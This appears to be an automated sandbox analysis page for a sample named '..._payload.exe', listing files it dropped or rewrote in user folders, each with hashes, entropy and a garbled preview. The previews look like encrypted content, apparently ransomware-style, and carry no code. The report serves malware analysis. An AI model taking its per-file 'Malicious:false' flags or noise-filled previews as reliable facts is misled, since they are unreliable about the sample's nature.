                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1071
                                                                                                                          Entropy (8bit):7.778236374380961
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ymSDa4eouoIlB+8cqmpsvhtb/RWD2eyZkxRxgbD:yxcFobqQs7bgDZyQRx6D
                                                                                                                          MD5:F19FFD555C4424879590327139FB3278
                                                                                                                          SHA1:9E424D7F4E1D97A9D9F5DCC285365A60AD249943
                                                                                                                          SHA-256:9530490356F6BA65C93701A2CA680589365AD954F816CF223CEC7761BEB665F8
                                                                                                                          SHA-512:225C8918E2838377BD39C14499741B5DA405CAB86FD6801BAC635FA854BDE98593D4B57B73F243A6E5170F29BB16F24A3DE4F9EB0C70763DC2638CA26AD6F141
                                                                                                                          Malicious:false
                                                                                                                          Preview:0...0........*(.X^S.M...E3/..LRo.!9H.w...Y).7P%.......A..OV..c.M.p.....r...p.2...@...xwa...F=..0s..C.O...F-.1..mwi`-&_.._{&.....J~.a9.i..u..]..`./..e....;*\...1...>KA0............0..h.g.|.6r%.c..8.{.V@-.b.7.YZ^E.y6))..r%.)....38...(.=.b....%.,..NNxN.N..H"..J....;.[......(mPa.....>.Nb.BC.....x..x1...^...m.;'.....}.......Q.ZNY...U*1.}94.m`>..<d..w..YC.....I2...-.d..cF.!../.?B...C4.R.r{:.....`^0.".J......0...4......1tZ....#[...=.*...ev}a..-......]..G..q..D..c.xf.F...Y.|...i.dP.E\?V.....W...)"'O?.....$.b.0.w..-d...M.*=........!O.3#b...M........L...V..._.i.."I.F~C../.5.....c.?..Y]...d.J.|.f.....sX...F....1s.Qx.'...*......6.p..\.UX../.....m3xf...T9.`&.n.ZEc........s.m.2.$he...4\...=gZ..\.,.......a>.Q...8^Y....DXH.T..`C.r....9..xpI...z.:.1.;.oX..<....Y.c.......f3....Rt..e..l.........u....m._z.W.Dz.x.1.T..:.v..T.;.8...l.^.NYr...ui..jA!...o."Fh0.... QE>F..k.o.1jF..H.R\.A~.$.].......Nd#|..E.e....c.Z.k.U..<K..<.c.z.P..`S..s...._.keGYRe..L.XHEphJtdHo

                                                                                                                          C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370
                                                                                                                          Entropy (8bit):7.191971716539646
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:s8y5CHJfToZDcIxTtun8/CEffAfWbUPB2waUCshdJq5PDTcii96Z:DH6vTQ8ZYfWbpONq5bTcii9a
                                                                                                                          MD5:46C0E97934485ACF5707D3348BCEB979
                                                                                                                          SHA1:5355282ECFFDB8D0194F1091F4634157192E1E5C
                                                                                                                          SHA-256:068B9C584FFF1C3EC2316B8447D74A174D9324FA28C6A4287EB06DE25313F5E1
                                                                                                                          SHA-512:40FFFCCD071976FBC904AE8E88CAD8841D15E9396A61E2ACFAF4E46918A7091BFC300777327A5DF0AC3053433116E518ACF79A092BB0B60B66B36FB396AC65FB
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDFT...i*.<..~.....*X2..W.z..."D......d 52.....|...V.",C/[....c,..B5V....U.WA.s#.cO...+t.TJ...(...*&..-.<.Y?4.M.....#+4.x.#.b;&Jk.3..2y.x0..H&.l....R%.A.B..0BF....b~.6...6o.).bwv.'..Id..YoF..Xb.n..|A.]...[.l...@.h.B...B....".....1+.lq..dd..c.b..Y..n....2.+?...7...v.CphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):388
                                                                                                                          Entropy (8bit):7.363595084817419
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:oCINIjC+ZaY+Kcc6+KYEqiHS2YEzzq5bTcii9a:oajC/Y+Zc6+KYjMGbD
                                                                                                                          MD5:84E732773D6B12D0070AACE833230FC7
                                                                                                                          SHA1:A78BC4910A1B3369C4E268EC0DDC6ED96452B7C0
                                                                                                                          SHA-256:BC3DD1B510B2A889AD365521C462515AF0B115B00B04D665C91E4594DF30F30E
                                                                                                                          SHA-512:E88976992609880174D198782AB737A6F1B6E9AB288134ABAAB329006253C9DCA534DE38F3DD907244904B4054798D6003AA5AA1564797F63BD1A19C97DFADF0
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDFT.!Ky.?...&zeE..S..1.y\a...~..x.N.R]...`.{.Z.S.Lv.0#..$..J.'/*.3.0PQf....oO...>....y.<U..O.i'..5..."...gW.!.:...]..U..<.U..1.d...j..H@.`.$..;.(/.d.X9.ok...c..0...e.#...n.G.9..E..G......3...GB.....9-.za...J....H..q7..wd.^H:.=.A.T.s.9...x.#OC0...._;.Z.)...oa...A...0.:j...]..7.8}.:.F..k.o...q.B..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):350
                                                                                                                          Entropy (8bit):7.223972817834662
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:QI2LUgwcKXPG41zqaPFh/0WjZqOf5cPJWWXbbxPn8N9Zwt7+MImGQGnIcJmOW9pd:QLL2xnXPFh/bZ1xqFbdf8N9I7+JmVcJO
                                                                                                                          MD5:A6CB27CC420439489492489A7ECE5D83
                                                                                                                          SHA1:4C10EE2405974C9B99EA091FE6425E0BE6E3893C
                                                                                                                          SHA-256:836EB84918272C8B04105E541CEB175EE90E09D12EEF8017BDB1F9FA0F675E50
                                                                                                                          SHA-512:131DA30DBF7A2F9074F3CCE15D823B1455B65F5D72FABF3BE2F284F55801818A50B649294A7446DBD413B465BFD2DFFFC5B63E58B246B5DADEC2B41479E2D3FC
                                                                                                                          Malicious:false
                                                                                                                          Preview:..j.o..8?t..G<.........-.T..m..\.kEq...8...E....|mw.+..n.d....R....nU....t...Z.........|...Y.y.[.x..q...~..@8...:..[~.v...1..v.".7.......h..T.x.....h6..X.pi-..2c...#."C.g.:.y.=. ."...L....D.=+Td...>.tr....%A,.9.-.%.Qc.|:A.4...u.g=..@.1...dZ...0mzZNi.._..E.aHphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1352
                                                                                                                          Entropy (8bit):7.870620637406578
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Hk4p64mnFwyqhCiTmiaKTFk1sYCUfXbUA5vhe4+u2CiiU3dseb93eHbD:Hk4phuqyQCiTmuTFk1zrUAN84+u2Td3i
                                                                                                                          MD5:CE723EA7BD9C946D873C83F758E6F87A
                                                                                                                          SHA1:BCB6319193F20A2B13AF24DB3A7CFC69B6C035DF
                                                                                                                          SHA-256:F171E73C60BDA1EBFC38D820C0C8396F466CD46C2665B5433CCC8179214DF605
                                                                                                                          SHA-512:BCD9D842A1A8EE71CF109D94A43B468259A71EB86A78E4B31B4613AA334ED36FD27B0626D9A4FEBC3837CB6D22B47694A62BA8575096DD45BC708CEC3729A233
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...\-..`z...v2.[.\.mF,U...`....Li.........a.X.....q}...?*...!W.r*..{.5..=.....`~...p...m.......U...nt@Z.@Q4...-..d...s.D.\.P'..y....tK.)5r.f..<I...t\H[<$i&}.X{F....... ...$.@u.Q.I.0..`x.@<O...._..q$.U9X....w.Jn.v.Bl"O.T........O...]......w.s...,.tU..4....p..g.w.,=C...I.Z..&[-.....X.#.C.....$.5.6b.W.;.;e.q.{... .....eC.....c]6.....b.......+y.v.........'.j*|-...*.~.hp.AMgXX..;$....1..H K.W\.U$.j.....Up...yM.'....(....B...!.....CzHY%}.G_...f.P..CH...K........b.{_..x.^q.c......4.i...{B..........C.{.=.|.....3.n...N...'o...F.....H...cA.x..yG.p...]m.-h[.L...|.{eUX*..sK.%v5.0au'.2..$l..)..i...:.`.........~...{.Z.......i.W.r|..l..%..-SH.p..jv]C&x.f...X@f@...$.d.....{./....... .x>..h.S.+b...uJI..k../2..:.@....,.....3.....E.......y\f."R....S..7..=.H&^....h.b`...U..U..E.......)...':w...>..G..Q#<9.x.>?'i.<.0...Il..r..ea.@.Rv..../.=....[k8.[Tw.....d.."uG.vuX..P90:k".m..8a.u.^iZ...1K...'.rn..O.k....o}..Y....[...5...<..y.,~.^n...,V,...1.M

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2424
                                                                                                                          Entropy (8bit):7.910992894872235
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:am3zxi1YBmbq/QwEKHiq5do7d+V17lfvGMLPEDf/rL5XKu1TpAjxmtEnJD:33zxetq31Cq7VxlXBwDXrLFKu1TRt4h
                                                                                                                          MD5:A1F5F047FF31E7A33FB57865F5C80484
                                                                                                                          SHA1:43D87B6304290C0B3EB65AEEBE52CD97D6BE27F7
                                                                                                                          SHA-256:C12284B52570894B68EE8A35A83E4D544ABEC27762AC484AF3B3113CA2BD2911
                                                                                                                          SHA-512:C2EAB35FB6E696B72B1F049E3B5D7943C03DCCB04FD3EFD6164BAAE093D518D380F9B868138878801C32B602C100D3B2C9D8042F8EFD405495BB5981D8A196AC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..IG..L..~.....F8.K."..I.....7..%....O^FT.........k.s...........`k.(.G.@.....?.r......!...X..q...<qk.o.3@+.$..s...G{4.....r.)..Y...>j.V0w.HS.T....2N.?...H....M...?....4..j....T..{.}>70.fp4.....5z.Z..;e.....k.U6Y./.w......96.?.ZJ!..&.{.....)..W.Hg.L......D.?_...^....V..:......[......B...V.-......)..?|%....j(..,...{..N....l......[..l......b\k.G..Ud_......;W....".I.8[,9;.0..b....y...C.FD...Y.....bm...-..=H....*..Yc ...4.I..O.<k._.(..n.V.02o.U...q.u=.`.UA....|..cz..3*..'.#..f,.....//.w...M..F.j.....f%>0....`hJ..1.u...iN/u._G...m.-w.....U.6f..\G.........h%....w..nF.o..XW..Ng.Re.D..'{..Ny/..@bt...%G#OL=...k..u.....{.....r.VJ1.C:....Z......].q.*.ipg..[}w..6.a..\y3........8aP.=.!........Z...P..i.^V/]/0.>BG/tkP...."J.V>.D..&.N...}.l.X.tJ.C...@..|ZLq..<=.R..2.c..,........^K.ZCb.........wj.....sqhm.U..3Tu........z=.s...:....?.....A..<......."..O"..O...jh..%....k.;..n.p.qc..Y.r..?.@.b...$.IC....,....m.T)....E .e.....cm..1kQ~.X.;$_Ey.7....:.i.p.9...L56S

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2381
                                                                                                                          Entropy (8bit):7.931925300137616
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:OpXqZ3QzCdwQBDyblPzaG6FB9E+dWp7ivtpN/FzRkQs8D:iXWQzCW0Qw9944t5Kq
                                                                                                                          MD5:DE95EDFA8483AB6484201165EC7D9814
                                                                                                                          SHA1:F80F93CC33D6EC7FCDC07476BFCA5252602E5934
                                                                                                                          SHA-256:D6E1FADE77B58A16C1DA7F4C07CCEB4721D1A02BBBD54B49A7DA696202365F99
                                                                                                                          SHA-512:A897DE0F07B168B8E79FC2BE152022EA4A0F00A98AF45C1FAEBD09D9170530A51A110BEBD3491AD651B30943EBFA26E4163F0B3DF6B6FF952865898E860DEDCE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml .=.X....\.6e..W..B....Nv[@...S...5.^.....Odp.......BBU4|....ki...)[.........).W1B[....iz....|....os.5..V+..qf0#C......]jU.2.....!.w.....B....m..'9.....=..k"8.....e.k.......X.-P....c....U'.b[......b.+<.T..L3.....%U:)(.q+:..f*sg..pr&._o..h...../C...S......$x;....O.X.......dBi<.8......=...x.9.q.#7..*|w[.X6O....k..R.1o.{DI..X..e6....yE.e.~p...W=c.t...m+....$........,v..$..V..1...'.....F....Q...j....E..K....F.n..X.;=..L1qr....7..}...a.r'Q.5...h%?U6.x.........B..6..z."+.'.......4.+.f.'..T.M..Z..L.e..0..AZ.&.KF......h..G. ._...}.>e....$.r....Z./..^B.0...y.......H.Mp.{..........v..>...c..*.L.B....2...!.z.R.j.e.N~..Z_m.4..C.epk..I.X.-5..Z.?.~.+.?..x......XU4..*..hE~i.8fq..Fa*.......?.q.....I....U.:H.+D..vo.q.{...m.hs.....)d.....7...8.vUu.:L..ns..1.h....ZO....US...#...e{..bu.Kb%...lj.H.H........}..".^....Q...c..2M.c[..../..6_.J...a...k......y.k..........].o2..ru.?.._a.....T:.......(.P....*.p.I.ugp.).....S..KO.InA..@.?Zt..K.r....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2398
                                                                                                                          Entropy (8bit):7.917170968085167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Uc0ZY0QsrJLLPtKx4WZKyjdGXiTV1Z/ldcrGBhxzMApsFYv5OkV0WHGED:U87YMx4k9dGXinZ9dOIPJpsYRPKwh
                                                                                                                          MD5:6C976E54C37FD581CDAD4448A215B953
                                                                                                                          SHA1:9824F99801653C5DDE241AA6F54466FC907A524F
                                                                                                                          SHA-256:42AAF8837A8A707829C7717DF200EBB5EB2DB8D2F82CD16ECF4FDF636565C9F4
                                                                                                                          SHA-512:0986E75950DF9274C8A8369464E3D7D7BB2F65D92CD8D6DE15B76862E0B662AFF586A78FB8D0D6FD6F688DBD0B8F24FE5872D08DD224034DA98AAC32BAA0F132
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..;....v.......L...S...F.....g..J...r..(b,1Z......L..'8...V`.I.2..L...m.....L.t.T9}oO/..~&r..O@.b.Z..yms.v.....2...R]...%.......j{.y0.F...R.j.t ....T..o...b.Y...h.].....Sa....6AF.x. ...h.`......<.T{......,...KV/.2Q2....6....N.M+IHA.:n......~....Q'....]B...0....:Zj)4..O.........B....1r...!=).+...jCr...h.MG..p.[wA..Mn.s.......v.*...x.1Wm...!.}9h......a..EC....ww...y~....P...1.H.O...fU..\..Y...xE...]......vIYQ..H.T.~*_"..r.....>..L..T.}.....*V.Y.....h5..4....q..2,J..@jp.....#.9.V...f1-..:....m.z;*-,7..YD..0+.85.f.69r..g*5.IWHSjn.<?.|$...8...Z...<..S~WiX.2O.o....me".7n......B.'c.tVc&..b......g1X.......QH..X2..,r.|h9..FO4.9$h.|.S.:Q.m.<.......$j.qw"5.2_h$..zO.!......3...pT.NZ........g0.......5..4.Bauf....z..%.D..J..0 ...l.v....u....w../W2.}..$q.>Q.....f..".}..7....DzA.....6.$.9..'..9u....SM...*...N..z..IZ..T...#.i. .p.rb$%.Y.@Y$.n.....Ic...R.g>..%........p.U.....B\.........+...<`.&..d#.3...A....|$|..BB/a.....M.9..a...M..$..$...-.l..L.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1358
                                                                                                                          Entropy (8bit):7.85514337507523
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:0Tj4FBSaJfH/FGkvZAwSv3s6nHC2W6oIhS1N2+jNj6Rg2mUPxvVGubD:Uu3V/FGkvOwxYHDqV7tUPpVdD
                                                                                                                          MD5:72C88CE8AB773EEFB3C1074C0068A8C6
                                                                                                                          SHA1:4A54F750E71C9692BE01AA38952642D30FCA3DBD
                                                                                                                          SHA-256:B1004E2834144AB0339B87B91FB4E512D01D9C401B94373FF5415EB7A197E15F
                                                                                                                          SHA-512:B3FD1B739DE51BB857481BD4FDA4E7C503724C04343BEE742E61CECAA126C556AB06F405BAD0F178614DF762E81F309535818B16B6F8E6B9A59CDBC582C8BC1D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml{.......zh.....Z...G..X...7.T.>.0.h..^.....I.3W..`{.......!..o..oB.......E.....b.|.".....1....lcw..+_.FyD2....oB{..s..........{..iv.?.....%T......9..'2.Kf.....[....V....@.2B.o.......gn8A.O.p|4..ps.SUF'..E....%.q....z..`.....Z.K.O..H?.......Gm{...O.....?qB..R........kz...t...(.'..n.q.....@SK@..u.4u...#.I!8-.....,.4.s....:.....2......z....,ym......:.%B..w....8...;g6..Yw.Q..-..o.3........W$..QG]NO.M..F.....fn...7......O7...Tg.......`..AA.1U..&.<..{..].z...=.v|~l! .?...~.........*.......0..A.=4.&.*.E%RZ..JC.t...O".y...I.f.8.q.....3.m".....E...r.S.....apO...t'......../3.J1b.[_.s.].W.WB.../{...?..F....v..A.=\.pXsQs'.)"...|...-.T*.......5..ga.nl&.....[..o(3..j...".V..~.[...E...'..'....8.....a... t.....`g.a........oP|[39;&6b;Fq....>^.ul.W.7.t........:/K..p7v..".I..Z.a.j.......u...iD....._d.&...|d+"..>Kf,ei"x.4r.6....5..$....RBcS.N..e!.C.u..i.r......X....... ... ..?......C..~0.~.'n...2.@...`.M.T`..J..6..X...i....)..28d...]"...b.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2409
                                                                                                                          Entropy (8bit):7.929664030196034
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:f6JYpvLnNyk5mX+IVQD/CAHHwd1gqzInMV7najH++RVZVi1zVF1izGr8D:fmY1Lnckx6Cwd1g07arpMSU4
                                                                                                                          MD5:2FEB5599F2CBBC7FC66E290F5FAEB12F
                                                                                                                          SHA1:03B27498DA3E5D1643F72C7E76E2772B698A387E
                                                                                                                          SHA-256:3523649520CECED966BB5B71DFDC593C4D42C68C0B6EEA81AE76F3BE18C42D71
                                                                                                                          SHA-512:A048D062C6F024344B07C6C15602589C7AAE1A76787213516CF3D13DC52A92A080B5313DB25FFE5BD7588AC4D5A948BB18A5DDBF17F319ED5E91848DCC5120B5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.. 7.{A.&.v.....t....F,..5-.te.}.x.].......$(.-....@S..>.|..pu...b.*.............^......6.#.E.z..:...Q...#.W.F.\]._..yuj..#V....5$c.8./...8@S..A&...8..T....ezL.QT......7.V.l...Y2.l...2..U.4...H0.#4.,..{!.t.....e3..C..l.q..0...1..*....H:...V.... ..I..8;..+w%P6.&5.H6.\.....lv.4...r......V<...X..@c.S......<...Dt..eh.M.s)..........6..b..:.?....~....Y....0)...*...&.P{..pI...N|_...lIo..\....W.Tf...$i.j.v..L........./L..K.=...>2/4...E.K..A.......'8..hK..K.:.m..<.....d....F>.6RT...kx.`..;.= ..X..t.....-..i.A.d.....N...x..5.7..R.s....8.||#...+.}H..)]..;."........c .x.....;..~..].6....I.........o.!....9g.d.C.o.$MA./...K.>..C..4 .WdC.....,.o..A..f"d.gx..C.,..}.N...<..]X UXr..-$."s.Q\.;)....1..2P.X..:.r.S..Dq....'.[.7.R.Q@.qA."n...9.....5.3c......D.1......R.b[.=.m.........F.....A...#.S;.1.....M:..#...'f.B.Yws2.8..{.`>H.....?..f...$.m[..99.>..Y...K.E.j.....-O~..>Q..].4.%....s9.........4(X..h7.......o...!C.V....R.s......-...p'.q.X....&p.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ANHVHMGQLM.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.865346689638786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:hZNRPh4NstGya7TuTOFVD8CDTcUoCDzHBY0JMxHq+ZukFm+KB4MAnobD:hzU6CiaFVdDy0P+ZVC6aD
                                                                                                                          MD5:B7BD5080691077EEEA3B7614970850C3
                                                                                                                          SHA1:239DC9C5B305264FCB81A2C5720F1D53CABECA17
                                                                                                                          SHA-256:A3C8B55D6996B6425A345864962A2750944A7CCA3A96513E31F4EB182D6C0747
                                                                                                                          SHA-512:3DB0A279EFCFB06284636D210993486FCCF18D66228C98095AC02FC8370049472E6B1FAEBB6948B35B401CEDE4C49AD2A2DB2D939E0CA80A13B4F69808257004
                                                                                                                          Malicious:false
                                                                                                                          Preview:ANHVH<...w...=")IL....4.fA..bQ.y......-s.u.....$.5}...@.E)...|U....2.......Z.a%...A.u.<....?(6fjt...s.0 e...-.V.H..L.3.O.v..g....L....uQ..dI......9q.5x.Z.y...x...0..2.}.{..5c.4B&Uwo.b6.bM..H.x.4....]1%.i..H6{...(...!.... .\f..l.>6.V.....?......*...._.....r.n.C....4.-0.S.'S.!Kg.1-.u..}..y......D...S.-LS...Q.og.!D.D........h..+....p...l..CF..]...m[z..'.....o.xY...[..h.q.....j.'...c.u.B.........oM\Q..<......SH.}.*Q..dd^o`/.....)+..ML...S......c.tzk....$.a}t..D......r.'.....H..LB/.R0.x..%.8.99..o......~..Q..!..Mi......(eJwE$Z....72....O.h..e..>..m:..p..Ut~ ).{..IIf..?{..n......:?F...P.^.G=.....a+.....,S.k0..f..=..|.:z.k?.usU...zc..F......7M..*.f]....EV.I...~...950.....O.K..?....v..p{lA...3(%D.^$...0k..W....{xU.....]........m)..........Ni!..... "...%.o[......AQ$.....+.y;...t^..W{f......X...F.....0..Y_yP]$|..\.>.P...Y6..F.p..0.J..ch*|..q..f..=`.&J.&oC9..+}....).%...O...........CD...j.P.pT..A...\...|...k-..%.U.u.ed....C.I.../..C........

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AZTRJHKCVR.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849194227385491
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:i+raeBtA+cg1ArOyBuCRPxqc/L7z9McznKvrAWOBls3SisbvzbD:iM/jATg1GRPxnGcuvhOPJD
                                                                                                                          MD5:8C75D33512CDA7050DC545A2EFDD1F56
                                                                                                                          SHA1:03AA5721882A98440B4D77D6F57A0D867B9B8EF1
                                                                                                                          SHA-256:86A8FACADCDD629AE17DEE1EC0F0D059362C5119B1B0FEDA4CBFD441908D4B2F
                                                                                                                          SHA-512:AC40F943B4665DF9D79BCAE0A8A3BDEA25EDD99266C1A3D34D127E54664C10376DBC2E8AA564FF0AB6D7ACCE789301931E03B515F62E7D30A9ACE79C5DBA80F2
                                                                                                                          Malicious:false
                                                                                                                          Preview:AZTRJ.$....@.....%......J....D.FK.X..I...{..w.r:..`............;qdw...?.C..v..T*R\.....M...B.....t.i/.4._.......7.i....I..H....(1O%...iE.|...o...f..l......{....O'.S....9.F.c.IX.0{r.*..>.......w#..`]~OWm1...#.L.[..a......t....R......M.d.."1 ....d/.ut'h.d.B.B..5.d.g.<.*...P..JbuR..J...\.4.e.....g._.1..'..O....{....E......w.Y&...7....^...z..\|*..Nv...b.....D.f...H.t......jj.Aw_X....\&...~K.h.4-X..A..5...... ....'3=I...........jj.6f...@..uH.m....0...&.D..qz..'..qU.....V$.......jkN...,H.H..76/V.k..o.<p...v..?#.."...Tp...<..4.p.]+,...>*..+ ..H..1..C......Rr4..m..0..B...o}.2~...@.o........}.F>..).;.Il0..'..w..g(._.f....Vz.....Bo.L7.>I..R..y.......P...!\C|.*..H....S[.....r8...S..k......$.`...N-....y..n%7/&rK..e.].8.A.J.H...5du}.0w..O.f...[8..E...-.Vh4.5Z..j......O@.=v....A...&....b...9.nDm.j.S...).. Qw.!?r.e..wk)./.f}&Y...oS...).1.5Wm#'....*(..!...z..."cE..,.,}F.]...2e..<?......*y....o.>y;^.....g...~R..........zg.R..\.....=_.+...fQ.....f.. .x.5.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AZTRJHKCVR.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.831101303520289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:C2B1fQO7y0EoO0R36dkTEeK2dz0VP/5CzCaMBSs0Wuty/pyAbD:C2/IOy/VwRXExCziBgtyhyaD
                                                                                                                          MD5:686257AD4241A69ACC654DA83367D255
                                                                                                                          SHA1:202CD20D4279A01E8D9792ED7865C2ED31D9DC28
                                                                                                                          SHA-256:AFA25B4426EBDF4F11B31710E41B1D678DB0631C078C0EFF76177CD94720D099
                                                                                                                          SHA-512:556C19CD9CC05E47C49F4AAC013210763A91B08C2D09D3123B6A0E22EF661D7A4C9ED025A87EE3D15029C9733334986EDDF71AB4298A1646EB5F061A7FDC6C95
                                                                                                                          Malicious:false
                                                                                                                          Preview:AZTRJ.....\.N7.D.......a3e`).x6ucP.>.8.'...z..\..E....M.=.Z..}../.^..C..~....Z..uA7...!..^.<1.......n...[s...OX.}.@E..k6......B....<..... )e...:..9I..+d....).....W..c.L..%i0v.bOc.......+D#M!....@.......,.r..N%H.5.#|Md-........R......^7........%-.j.......4W...4....>5.E...Kq"..N.L...r..."...j=.L.kQQ8......$... ...J...3.HD...Fp....I...m.E.5LI.D...73..Yp.....f.T.........Nl].. a.2,u)j|......R.....L.DHc...D.l.....q....s..E....A..'1.E[...9.%...Ek.l.3..=TY...vF_..o.S%[.7..v..K.n.h......SQ..".?...X..).vC.xZ......\.Rn..A..;..........Y.Al}..YG.]\.@a...h....ml)3N..].;<s.....kS$B../;.i)../..-.a.nA...{%_.=B....A...{S...p9.*..Rd1>..mV<.#.H........t..%.1tz...U.-5.>...g(..P...BL..e.ae...m!..A&i....!.q99.t..D........q....Rd..+.......wE-.!5..j.Y..A....L.51..x...5s......Eo.S%.YV.|.,....p...1}a...'......TG.!.T..K.".R.0...e`1../?(.B..K..uA.W(.#..]......>'.k..I...E..I..C.G.ek......[..,V..$...H.C....*...........N...(.k.cEN.\.uW.i.$<.T...3....Gi6&.r}Fvp.b..+.Z..@

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AZTRJHKCVR.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845737323526036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:B/pfhe4ClsL0Eo5xHHaupxWO1IDZhZMOTghgY1trG4y013uZp/eqdCqkUgtxbD:BphXL+H3pxWO1IjSbhgY1tC4Z13up/eJ
                                                                                                                          MD5:13BEB7A45B79E533A2330BDC1751A6F1
